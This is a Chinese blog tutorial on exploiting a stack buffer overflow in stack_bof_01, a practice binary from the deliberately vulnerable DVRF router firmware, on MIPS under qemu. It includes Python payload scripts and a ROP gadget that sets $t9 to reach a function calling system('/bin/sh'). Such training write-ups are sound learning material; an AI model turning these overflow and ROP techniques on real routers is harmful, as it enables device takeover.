一步一步pwn路由器之栈溢出实战

前言


本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274


本文以 DVRF 中的第一个漏洞程序 stack_bof_01 为例,在实战 MIPS 架构中栈溢出的简单利用。

正文

去github上面把 DVRF 下载下来,然后用 binwalk 解开

pwnable 目录下就是相应的示例程序

在解开的文件系统的根目录下使用 chrootqemu 运行 程序:

sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01  "`cat ./pwnable/Intro/input`"

使用了cat 命令读取文件作为命令行参数,传给目标程序,这样可以使我们输入一些不可见字符用于劫持程序流。

stack_bof_01 是一个很简单的栈溢出漏洞程序,它把用户从命令行传过去的参数直接使用 strcpy 拷贝到栈缓冲区,从而栈溢出。经过调试,输入204个字符后就可以覆盖到 ra 寄存器保存到栈栈上的值,进而可以控制 $pc 的值。

修改文件内容的 python 脚本如下

#!/usr/bin/python
padding = "O" * 204
payload = padding + "B"*4
with open("input", "wb") as f:
    f.write(payload)

接下来就是考虑该如何利用的问题了。程序中包含了一个 执行 system("/bin/sh") 的函数 dat_shell, 如果是在 x86 平台下的话,我们直接设置 $pc 寄存器到它的地址就可以了。在 MIPS 如果直接指过去或怎么样呢?我们试试

访问了非法内存,异常了。
原因在于,在 MIPS 中,函数内部会通过 $t9 寄存器和 $gp 寄存器来找数据,地址等。同时在 mips 的手册内默认 $t9 的值为当前函数的开始地址,这样才能正常的索引,所以我们需要先用一个 rop_gadget 设置 $t9, 然后再跳到 dat_shell 函数。
在libc 中可以找到这样一个gadgets

.text:00006B20                 lw      $t9, arg_0($sp)
.text:00006B24                 jalr    $t9

加上libc的基地址就行了。用qemu-mipsel-static模拟程序是看不到目标程序的maps的,所以我们可以通过打印 got 表的函数指针,然后计算偏移得到 libc 的基地址。

所以我们现在的利用流程就是:

  • 修改返回地址到 rop_gadget, 设置 $r9dat_shell 函数的地址
  • 跳转到 dat_shell 函数,执行system
#!/usr/bin/python
padding = "O" * 204
gadget1 = "\x20\xbb\x6e\x76"
dat_shell_addr = "\x50\x09\x40"  # Partial overwrite with little-endian arch
payload = padding + gadget1 + dat_shell_addr
with open("input", "wb") as f:
    f.write(payload)

总结

  • 学习到了 $t9 寄存器的重要作用以后再使用 rop 调用函数时,要使用 jalr $t9 类的 gadgets 以保证进入函数后, $t9 的值为函数的起始地址,避免出错。

  • 使用ida反汇编mips程序时,它好像默认 $t9 的值为函数的起始地址,导致我们分析问题时造成困惑,pwndbg 和 radare2 就不会这样。

参考链接:

posted @ 2018-08-03 22:56  hac425  阅读(630)  评论(0编辑  收藏  举报